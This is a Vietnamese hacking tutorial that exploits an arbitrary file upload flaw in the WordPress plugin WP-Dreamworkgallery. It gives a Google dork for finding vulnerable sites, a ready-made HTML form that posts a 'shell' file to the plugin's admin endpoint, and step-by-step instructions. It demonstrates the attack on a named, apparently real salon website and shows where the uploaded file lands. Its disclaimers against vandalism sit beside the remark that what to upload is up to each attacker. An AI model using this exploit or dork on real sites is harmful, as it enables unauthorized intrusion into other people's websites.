Plugin WP-Dreamworkgallery có chức năng gì thì tôi cũng không biết. Chỉ biết là bây giờ nó không còn được phát hành trên cửa hàng Plugin của WordPress nữa nên không có thông tin gì thêm . Plugin này tồn tại một lỗ hỏng cho phép Hacker có thể tùy ý tải lên tệp từ localhost.
Trước tiên để khai thác bất kì lỗ hỏng nào trên các Website thì ta cần tìm kiếm Website nào đang bị lỗi và chứa lỗ hỏng để khái thác .
Để khai thác lỗ hổng Plugin WP-Dreamworkgallery ta sẽ sử dụng Google Dork để tìm kiếm .
Bước 1 : Tìm kiếm Website bị lỗi
- Ta truy cập Chrome và gõ dòng sau trên thanh tìm kiếm và nhấn Enter hoặc Tìm Kiếm để tìm kiếm .
inurl:/wp-content/plugins/wp-dreamworkgallery/
- Chọn bất kì trang Web nào có trong kết quả tìm kiếm mà có chứa url là dòng trên
- Ở đây tôi sẽ chọn trang Web có tên : Hair Designs - Salon Blue Hair Salon
[ Đây là làm Demo . Vui lòng không chọn lại trang Web trên hoặc sử dụng bất kì trang Web nào chúng tôi sử dụng tại hướng dẫn này . Không được phép cố gắng phá hoại. Vì ai cũng có việc kiếm cơm riêng. Xin đừng phá hoại người khác ]
- Khi trụy cập vào link mà xuất hiện như trong ảnh thì tỷ lệ thành công tương đối ( 60 - 80 % )
Bước 2 : Tạo chương trình UP Shell
- Ta tạo một file với nội dung dưới và đặt tên bất kì nhưng bắt buộc có đuôi là .html
- Ở đây tôi lưu tên là up.html
<html>
<body>
<form action="url_site_bị_lỗi/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
- Thay url_site_bị_lỗi thành url trang web cần khai thác. Ở đây tôi thay thành http://salonbluehair.com
- Tiếp theo ta tạo một file shell . File shell có thể là file html , pdf , .... bất kì cái gì mà site đó nó hỗ trợ . Không biết nó hỗ trợ hay không thì cứ thử hết là được .
- Ở đây tôi dùng một file html và đặt tên là shell.html . Bạn nào không biết HTML thì một là đi học , hoặc là về học lại lớp 10 . Phần đọc thêm của môn Tin Học có hướng dẫn tạo file html bằng Microsolf Word .
Bước 4 : Khai thác
- Ok ! Đây là bước quyết định.
- Ta chạy file HTML mang tên up.html tạo lúc nãy . [ Chạy bằng nhấn đúp vào nó hoặc kéo nó lên thanh TAB của Chrome .
- Xuất hiện như này là được :
- Nhấn Choose File và chọn file shell ở bước 3 . Sau đó nhấn Submit và chờ .
- Cho đến khi xuất hiện như này là được .
 |
| Nhấn vào ảnh để xem lớn hơn |
- OK ! Bây giờ xuất hiện như thế là tỷ lệ thành công đạt 95 % rồi. Bây giờ chỉ cần kiểm tra xem nó OK chưa .
- Ta copy link như trên ảnh [ Dòng bôi xanh ]
=======================================================================
=======================================================================
- Link đây : /wp-content/uploads/dreamwork/12706_uploadfolder/big/shell-.html
- Bây giờ link ngắn trên là nơi file được UP lên . Kiểm tra bằng cách dán đường dẫn đó vào url trang Web . Ví dụ , trang tôi demo là http://salonbluehair.com thì bây giờ nó thành http://salonbluehair.com/wp-content/uploads/dreamwork/12706_uploadfolder/big/shell-.html
- Đây là ảnh sau khi thành công :
========================================================================
========================================================================
P/S : Không khuyến khích đi phá hoại . Nếu thành công , vui lòng mail với chủ trang Web và thông báo cho họ . Với nhắc cho các Trẩu biết luôn là đây không phải Deface nhé. Nó chỉ là một dạng up file . Còn up file gì , sử dụng ra sao thì tùy vào mỗi người attacker .
OK ! DONE
[ “Cuộc sống này thực sự đơn giản, nhưng chúng ta luôn làm nó trở nên phức tạp” ]